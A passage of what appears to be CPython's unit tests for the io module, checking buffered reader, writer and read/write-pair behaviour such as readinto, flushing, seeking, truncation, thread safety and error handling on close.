("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
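        # Each entry: [buffer size, sizes of the buffered reads to issue,
        # expected sizes of the raw reads triggered underneath].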
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill the file with some data
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
